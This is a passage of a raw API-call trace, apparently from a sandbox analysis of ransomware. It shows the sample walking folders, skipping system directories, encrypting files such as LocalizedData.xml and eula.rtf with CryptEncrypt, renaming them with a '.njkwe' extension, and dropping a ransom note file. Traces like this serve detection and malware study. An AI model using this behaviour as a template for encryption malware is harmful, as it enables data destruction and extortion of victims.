returned -1 [0061.843] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 48 [0061.843] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.843] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.843] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.843] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.843] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.843] GetTickCount () returned 0x114fe28 [0061.843] GetTickCount () returned 0x114fe28 [0061.843] GetTickCount () returned 0x114fe28 [0061.843] GetTickCount () returned 0x114fe28 [0061.843] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.844] GetProcessHeap () returned 0xbe0000 [0061.844] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.844] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.845] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.845] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.846] GetProcessHeap () returned 0xbe0000 [0061.846] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.846] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.846] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.846] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.846] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.846] CloseHandle (hObject=0x42c) returned 1 [0061.848] GetProcessHeap () returned 0xbe0000 [0061.848] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.848] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.848] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.849] GetProcessHeap () returned 0xbe0000 [0061.849] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.849] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.849] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.849] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.849] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.849] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.849] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.849] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 49 [0061.849] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.849] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.849] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.849] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.849] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.849] GetTickCount () returned 0x114fe37 [0061.849] GetTickCount () returned 0x114fe37 [0061.849] GetTickCount () returned 0x114fe37 [0061.849] GetTickCount () returned 0x114fe37 [0061.849] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.850] GetProcessHeap () returned 0xbe0000 [0061.850] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.850] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.851] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.851] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.852] GetProcessHeap () returned 0xbe0000 [0061.852] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.852] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.852] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.852] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.852] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.852] CloseHandle (hObject=0x42c) returned 1 [0061.853] GetProcessHeap () returned 0xbe0000 [0061.853] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.853] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.854] GetProcessHeap () returned 0xbe0000 [0061.854] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.854] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.854] FindClose (in: hFindFile=0xc1a0a0 | out: hFindFile=0xc1a0a0) returned 1 [0061.854] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.854] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\2052\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.854] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.855] CloseHandle (hObject=0x428) returned 1 [0061.855] GetProcessHeap () returned 0xbe0000 [0061.855] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.855] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="2070", cAlternateFileName="")) returned 1 [0061.856] lstrcmpiW (lpString1="2070", lpString2="Windows") returned -1 [0061.856] lstrcmpiW (lpString1="2070", lpString2="$Recycle.bin") returned 1 [0061.856] lstrcmpiW (lpString1="2070", lpString2="System Volume Information") returned -1 [0061.856] lstrcmpiW (lpString1="2070", lpString2="Program Files") returned -1 [0061.856] lstrcmpiW (lpString1="2070", lpString2="Program Files (x86)") returned -1 [0061.856] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070") returned 30 [0061.856] lstrcmpW (lpString1="2070", lpString2=".") returned 1 [0061.856] lstrcmpW (lpString1="2070", lpString2="..") returned 1 [0061.856] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.856] GetProcessHeap () returned 0xbe0000 [0061.856] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.856] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\*") returned 32 [0061.856] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19f60 [0061.856] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.856] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.856] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.856] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.856] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.856] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\.") returned 32 [0061.856] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.856] FindNextFileW (in: hFindFile=0xc19f60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.856] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.856] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.856] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.856] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.856] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.856] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\..") returned 33 [0061.856] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.857] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.857] FindNextFileW (in: hFindFile=0xc19f60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.857] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.857] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.857] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.857] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.857] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.857] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 39 [0061.857] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.857] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.857] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.857] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.857] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.871] GetTickCount () returned 0x114fe47 [0061.871] GetTickCount () returned 0x114fe47 [0061.873] GetTickCount () returned 0x114fe47 [0061.873] GetTickCount () returned 0x114fe47 [0061.875] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.886] GetProcessHeap () returned 0xbe0000 [0061.894] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.896] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xfaf, lpOverlapped=0x0) returned 1 [0061.897] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff051, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.898] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xfaf, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xfaf, lpOverlapped=0x0) returned 1 [0061.898] GetProcessHeap () returned 0xbe0000 [0061.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.898] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.898] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.898] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.898] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.898] CloseHandle (hObject=0x42c) returned 1 [0061.899] GetProcessHeap () returned 0xbe0000 [0061.899] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.899] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.901] GetProcessHeap () returned 0xbe0000 [0061.901] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.901] FindNextFileW (in: hFindFile=0xc19f60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.901] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.901] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.901] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.901] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.901] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.901] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 48 [0061.901] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.901] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.901] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.901] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.901] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.902] GetTickCount () returned 0x114fe66 [0061.902] GetTickCount () returned 0x114fe66 [0061.902] GetTickCount () returned 0x114fe66 [0061.902] GetTickCount () returned 0x114fe66 [0061.902] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.902] GetProcessHeap () returned 0xbe0000 [0061.902] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.902] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.904] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.904] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.904] GetProcessHeap () returned 0xbe0000 [0061.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.904] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.904] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.904] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.905] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.905] CloseHandle (hObject=0x42c) returned 1 [0061.907] GetProcessHeap () returned 0xbe0000 [0061.907] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.907] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.908] GetProcessHeap () returned 0xbe0000 [0061.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.908] FindNextFileW (in: hFindFile=0xc19f60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, 